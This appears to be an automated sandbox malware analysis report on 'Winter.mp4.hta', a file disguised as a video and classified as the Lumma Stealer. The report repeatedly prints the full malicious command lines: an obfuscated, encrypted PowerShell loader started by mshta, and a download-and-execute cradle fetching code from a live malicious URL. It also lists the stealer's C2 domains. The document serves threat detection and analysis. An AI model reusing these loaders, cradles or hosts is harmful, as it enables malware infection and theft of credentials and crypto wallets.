Edit tour

Windows Analysis Report
Winter.mp4.hta

Overview

General Information

Sample name:	Winter.mp4.hta
Analysis ID:	1581902
MD5:	dd408ffa842e697a71fa466966538cb4
SHA1:	2eeb41877f0eae3ea95de8981684955111f26255
SHA256:	84b473ab26ef4382c0ad60ad93b780e0564245f9b1fffe28a3248b0c7d2470cd
Tags:	EmmenhtalFakeCaptchaFakeMP4htauser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Sigma detected: Powershell Download and Execute IEX

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

Yara detected Powershell download and execute

.NET source code contains potential unpacker

AI detected suspicious sample

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

LummaC encrypted strings found

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: PowerShell Download and Execution Cradles

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious PowerShell Download and Execute Pattern

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: PowerShell Download Pattern

Sigma detected: PowerShell Web Download

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64

mshta.exe (PID: 2000 cmdline: mshta.exe "C:\Users\user\Desktop\Winter.mp4.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

powershell.exe (PID: 6624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16EDE04A52F754852062CC5FFE79F1C1811C2A4EE43FF38387C4CD11A2EDCA6C57216DFC5D9E29ADFF0D5ACCF05998C02101CD723667780F3ECE0C9D8A3501F34E27653C8CC454AC1B9CFD63C7077F0256949AD3E3DAF6C6B099A8FDFBD7D13B638DE640A14ACFA2ED35860392CBFAF118DE0BA089D071F46AB6709E49AD48A6BCB90F215D487648968F3D24E4F165E6104C06BFD0522BF67BD6FC0E5E50796821857A2FB3F2C891AABBA7EF8AD692660794579DB6A00D57FBAF9F2AD64863974071C4D7E8C8BE2BDF8923280C6936769E41E84567C4940EBCD713F945DF7292AD0C75B27F4BEBDD48B6A53C89741AA6E5C0A8E6FA33C1B74178F50FA6FB6249B241DABE92267BC0A3DD4ADC73A94749C2E2EEFFA8DA6F2A045FB97C908B9436225EDF216DAF831E28AC1D8377C036AA3F2324DB4B8937836B29B3712AD27EBE29B03DB7930C6B0932627EC99DD59A0B04221337CFAB108C5B82612E53BAF222AD4A4FCB003B17174060EB5530CE7B9E694D54704BBE85697431BEF0DF8FB39514E546913E627324B7912AABC2519CDC16270DB9302DBA4235A5922582F6D19012A6A61A182460E5328B98785BBCA6DC1EE54C29B492DD0169BBDF0AD22735B4539FAB41765D2C78D6094D4933B0B9AB21F2194145068591FA2819F5844A17C9B3FE88007ABFFD555866F7C9BF9A7AE7857BD7D50BB0B679FDB641E588F7BA6998B1E09201B6E7429AAF1B53408F5BB85F586C567D650066E38E837E6F9B238A1169DAF40AC32351DE3006C93F4A0AC7408E46D98D725B1062464B5E6E747BE24FBD1B7DFEFCFDCA53481D894F0A6D7A6DF2DBAE5990233F3B5DD4A1DBC0E0C606F80172B012B5490EF0B0CC77328D4A2E0767896493EA713FDF1226247FDBEA1DA14AADF2D96D9AB01E6D4547C26AE');$CsiZ=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((rOnH('507A6B6D525573745374576441776A59')),[byte[]]::new(16)).TransformFinalBlock($hcNM,0,$hcNM.Length)); & $CsiZ.Substring(0,3) $CsiZ.Substring(129) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7464 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))} MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7448 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["rebuildeso.buzz", "crackerdolk.click", "hummskitnj.buzz", "appliacnesot.buzz", "cashfuzysao.buzz", "inherineau.buzz", "scentniej.buzz", "prisonyfork.buzz", "screwamusresz.buzz"], "Build id": "jMw1IE--bigJ"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 6624	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 6624	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x170c78:$b1: ::WriteAllBytes( 0x17160f:$b1: ::WriteAllBytes( 0x966f:$s1: -join 0xa552:$s1: -join 0x18cb1:$s1: -join 0x3f3a7:$s1: -join 0x40293:$s1: -join 0x413c5:$s1: -join 0x44d1b:$s1: -join 0x6345f:$s1: -join 0x63615:$s1: -join 0x8a4c3:$s1: -join 0x97598:$s1: -join 0x9a96a:$s1: -join 0x9b01c:$s1: -join 0x9cb0d:$s1: -join 0x9ed13:$s1: -join 0x9f53a:$s1: -join 0x9fdaa:$s1: -join 0xa04e5:$s1: -join 0xa0517:$s1: -join
Process Memory Space: powershell.exe PID: 7464	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 7464	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xcd97eb:$b2: ::FromBase64String( 0x6dfac9:$s1: -join 0x6ecb9e:$s1: -join 0x6eff70:$s1: -join 0x6f0622:$s1: -join 0x6f2113:$s1: -join 0x6f4319:$s1: -join 0x6f4b40:$s1: -join 0x6f53b0:$s1: -join 0x6f5aeb:$s1: -join 0x6f5b1d:$s1: -join 0x6f5b65:$s1: -join 0x6f5b84:$s1: -join 0x6f63d4:$s1: -join 0x6f6550:$s1: -join 0x6f65c8:$s1: -join 0x6f665b:$s1: -join 0x6f68c1:$s1: -join 0x6f8a57:$s1: -join 0x7074a1:$s1: -join 0x71cbe9:$s1: -join
Process Memory Space: powershell.exe PID: 7448	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Other

Source	Rule	Description	Author	Strings
amsi32_6624.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi32_7464.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: PowerShell Download and Execution Cradles

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16E

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16EDE04A52F754852062CC5FFE79F1C1811C2A4EE43FF38387C4CD11A2EDCA6C57216DFC5D9E29ADFF0D5ACCF05998C02101CD723667780F3ECE0C9D8A3501F34E27653C8CC454AC1B9CFD63C7077F0256949AD3E3DAF6C6B099A8FDFBD7D13B638DE640A14ACFA2ED35860392CBFAF118DE0BA089D071F46AB6709E49AD48A6BCB90F215D487648968F3D24E4F165E6104C06BFD0522BF67BD6FC0E5E50796821857A2FB3F2C891AABBA7EF8AD692660794579DB6A00D57FBAF9F2AD64863974071C4D7E8C8BE2BDF8923280C6936769E41E84567C4940EBCD713F945DF7292AD0C75B27F4BEBDD48B6A53C89741AA6E5C0A8E6FA33C1B74178F50FA6FB6249B241DABE92267BC0A3DD4ADC73A94749C2E2EEFFA8DA6F2A045FB97C908B9436225EDF216DAF831E28AC1D8377C036AA3F2324DB4B8937836B29B3712AD27EBE29B03DB7930C6B0932627EC99DD59A0B04221337CFAB108C5B82612E53BAF2

Sigma detected: Suspicious PowerShell Download and Execute Pattern

Source: Process started

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16EDE04A52F754852062CC5FFE79F1C1811C2A4EE43FF38387C4CD11A2EDCA6C57216DFC5D9E29ADFF0D5ACCF05998C02101CD723667780F3ECE0C9D8A3501F34E27653C8CC454AC1B9CFD63C7077F0256949AD3E3DAF6C6B099A8FDFBD7D13B638DE640A14ACFA2ED35860392CBFAF118DE0BA089D071F46AB6709E49AD48A6BCB90F215D487648968F3D24E4F165E6104C06BFD0522BF67BD6FC0E5E50796821857A2FB3F2C891AABBA7EF8AD692660794579DB6A00D57FBAF9F2AD64863974071C4D7E8C8BE2BDF8923280C6936769E41E84567C4940EBCD713F945DF7292AD0C75B27F4BEBDD48B6A53C89741AA6E5C0A8E6FA33C1B74178F50FA6FB6249B241DABE92267BC0A3DD4ADC73A94749C2E2EEFFA8DA6F2A045FB97C908B9436225EDF216DAF831E28AC1D8377C036AA3F2324DB4B8937836B29B3712AD27EBE29B03DB7930C6B0932627EC99DD59A0B04221337CFAB108C5B82612E53BAF2

Sigma detected: PowerShell Download Pattern

Source: Process started

Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16E

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Source: Process started

